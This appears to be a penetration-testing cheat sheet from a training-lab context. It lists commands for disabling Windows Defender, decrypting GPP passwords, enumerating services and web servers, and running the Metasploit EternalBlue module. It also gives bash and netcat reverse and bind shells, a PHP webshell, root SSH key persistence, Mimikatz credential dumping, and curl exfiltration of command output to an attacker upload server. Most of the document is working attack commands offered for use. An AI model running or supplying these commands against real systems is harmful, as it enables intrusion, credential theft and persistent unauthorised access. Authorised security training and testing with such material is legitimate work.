Useful commands

Windows & AD

# Bypass the execution policy for this PowerShell process only (not persistent; the execution policy is a safety setting, not a security boundary)
powershell -ep bypass

# Disable Windows Defender real-time monitoring (requires local admin, is logged by Defender and may be blocked when Tamper Protection is on; verify with Get-MpPreference | Select DisableRealtimeMonitoring)
Set-MpPreference -DisableRealtimeMonitoring $true

# Set the execution policy to Unrestricted and confirm it (default scope is LocalMachine: persistent and needs admin; use -Scope CurrentUser or -Scope Process to limit the change)
Set-ExecutionPolicy Unrestricted
Get-ExecutionPolicy

# Verify whether Credential Guard is enabled: look for CredentialGuard in DeviceGuardSecurityServicesConfigured / DeviceGuardSecurityServicesRunning (when running, LSASS secrets are isolated and tools like sekurlsa::logonpasswords typically come back empty)
Get-ComputerInfo

# Decrypt a Group Policy Preferences (GPP) cpassword found in Groups.xml under SYSVOL (the AES-256 key is published by Microsoft, so any domain user who can read SYSVOL can recover the password)
gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"

# Show the account policy (lockout threshold, min password length/age); check the lockout threshold before any password spraying or brute force. net accounts shows the local policy; add /domain for the domain policy
net accounts

Service Scanning

# Run an nmap script scan on an IP
nmap -sV -sC -p- 10.129.42.253

# Find the installed nmap NSE scripts matching a keyword (here: citrix); run updatedb first if the locate database is stale
locate scripts/citrix

# Run an nmap script on an IP
nmap --script smb-os-discovery.nse -p445 10.10.10.40

# Grab the banner of an open port by connecting with netcat (nc) and reading whatever the service announces
netcat 10.10.10.10 22

# List SMB shares using a null session (-N: no password; if it fails, retry with -U user)
smbclient -N -L \\\\10.129.42.253

# Connect to an SMB share (prompts for a password; add -N for a null session or -U user to specify an account)
smbclient \\\\10.129.42.253\\users

# Query a single SNMP OID (1.3.6.1.2.1.1.5.0 = sysName) over SNMP v2c with the default community string 'public'; omit the OID to walk the whole MIB tree
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0

# Brute force SNMP community strings from a wordlist (-c takes the community-string file)
onesixtyone -c dict.txt 10.129.42.254

Web Enumeration

# Run a directory scan on a website
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt

# Brute force sub-domains via DNS lookups (queries go to the resolver, not the web server)
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt

# Grab the HTTP response headers (-I sends a HEAD request, -L follows redirects); note Server, X-Powered-By and any missing security headers
curl -IL https://www.inlanefreight.com

# Fingerprint the web server and the technologies it runs (server software, frameworks, CMS and their versions)
whatweb 10.10.10.121

# Read robots.txt: Disallow entries often point to directories the site owner did not want indexed
curl 10.10.10.121/robots.txt

Public Exploits

# Search the local Exploit-DB copy for public exploits matching a product and version
searchsploit openssh 7.2

# MSF: Search for modules by keyword (this and the following commands run inside msfconsole)
search exploit eternalblue

# MSF: Start using an MSF module
use exploit/windows/smb/ms17_010_psexec

# MSF: Show required options for an MSF module
show options

# MSF: Set a value for an MSF module option
set RHOSTS 10.10.10.40

# MSF: Test whether the target is vulnerable without exploiting it (not every module implements check)
check

# MSF: Run the exploit against the target
exploit

Using Shells

# Start a nc listener on a local port
nc -lvnp 1234

# Send a reverse shell from the remote server to the listener (replace 10.10.10.10 and 1234 with the attacker IP and listening port)
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'

# Another reverse shell that uses a named pipe (creates a predictable FIFO at /tmp/f; remove it when done)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

# Start a bind shell on the remote server (listens on all interfaces and is unauthenticated: anyone who can reach TCP/1234 gets the shell; prefer a reverse shell and kill the listener when done)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

# Connect to a bind shell started on the remote server
nc 10.10.10.1 1234

# Create a PHP webshell (unauthenticated: anyone who can reach the URL runs commands as the web server user; delete it at the end of the engagement)
echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php

# Execute a command through the uploaded webshell (URL-encode commands with spaces or special characters, e.g. curl -G --data-urlencode 'cmd=cat /etc/passwd' http://SERVER_IP:PORT/shell.php)
curl http://SERVER_IP:PORT/shell.php?cmd=id

Privilege Escalation

# List available sudo privileges
sudo -l

# Run a command as another user via sudo (only works for commands listed by sudo -l)
sudo -u user /bin/echo Hello World! 

# Switch to root user (if we have access to sudo su)
sudo su -

# Switch to a specific user with a login shell (if we have access to sudo su); the '-' must come before the user name
sudo su - user

# Create a new SSH key pair (writes the private key 'key' and the public key 'key.pub'; -t ed25519 is preferable to the RSA default)
ssh-keygen -f key 

# Add the generated public key to root's authorized_keys (persistence: needs write access to /root/.ssh; sshd's StrictModes rejects the file if the directory or file is group/world-writable, so keep .ssh at 700 and authorized_keys at 600; remove the key when the engagement ends)
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys

# SSH to the server with the generated private key (ssh refuses a key file readable by others: chmod 600 key first)
ssh root@10.10.10.10 -i key

Transferring Files

# Encode a file as a single-line base64 string (-w 0 disables line wrapping and is a GNU coreutils option)
base64 shell -w 0

# Convert a file from base64 back to its origin
echo f0VMR...SNIO...InmDwU | base64 -d > shell

# Compare the file's hash with the original to confirm it transferred intact (md5sum is fine for detecting corruption; use sha256sum when you need protection against tampering)
md5sum shell

Tcpdump

# Read a pcap and filter by source host, destination host or port (-n skips name resolution so the analysis does not send DNS queries for captured hosts; sudo is not needed to read a pcap file you own)
sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap

sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
sudo tcpdump -n port 81 -r password_cracking_filtered.pcap

Mimikatz

# Enable SeDebugPrivilege (needs an elevated local admin token; required to read LSASS memory)
privilege::debug
# Impersonate a SYSTEM token (required for lsadump::sam)
token::elevate
# Dump logon credentials from LSASS and the local SAM hashes (typically blocked when Credential Guard or LSA Protection/RunAsPPL is active; check Credential Guard with Get-ComputerInfo first)
sekurlsa::logonpasswords
lsadump::sam

OOB

# Start an HTTP upload server on the attacker host (uploadserver is a third-party pip package, not part of the Python standard library)
python3 -m uploadserver 8080
# Send the output of a command to the attacker (127.0.0.1 here is a local demo; use the attacker IP against a real target). /tmp/output is world-readable on the target and may contain credentials, so prefer a mktemp file and delete it afterwards; curl --data strips newlines from the file, use --data-binary to keep them
command &> /tmp/output; curl --data @/tmp/output http://127.0.0.1:8080/upload
# Monitor traffic on the loopback interface, TCP port 8080 (-X prints the payload in hex and ASCII)
sudo tcpdump -nvvvXi lo tcp port 8080

Basic Tools

Command

Description

General

sudo openvpn user.ovpn

Connect to VPN

ifconfig/ip a

Show our IP address

netstat -rn

Show the routing table, i.e. the networks reachable through the VPN (ip route is the modern equivalent)

ssh user@10.10.10.10

SSH to a remote server

ftp 10.129.42.253

FTP to a remote server (credentials and data travel in cleartext)

tmux

tmux

Start tmux

ctrl+b

tmux: default prefix

prefix c

tmux: new window

prefix 1

tmux: switch to window (1)

prefix shift+%

tmux: split pane vertically

prefix shift+"

tmux: split pane horizontally

prefix ->

tmux: switch to the right pane

Vim

vim file

vim: open file with vim

esc+i

vim: enter insert mode

esc

vim: back to normal mode

x

vim: Cut character

dw

vim: Cut word

dd

vim: Cut full line

yw

vim: Copy word

yy

vim: Copy full line

p

vim: Paste

:1

vim: Go to line number 1.

:w

vim: Write the file (i.e. save)

:q

vim: Quit

:q!

vim: Quit without saving

:wq

vim: Write and quit
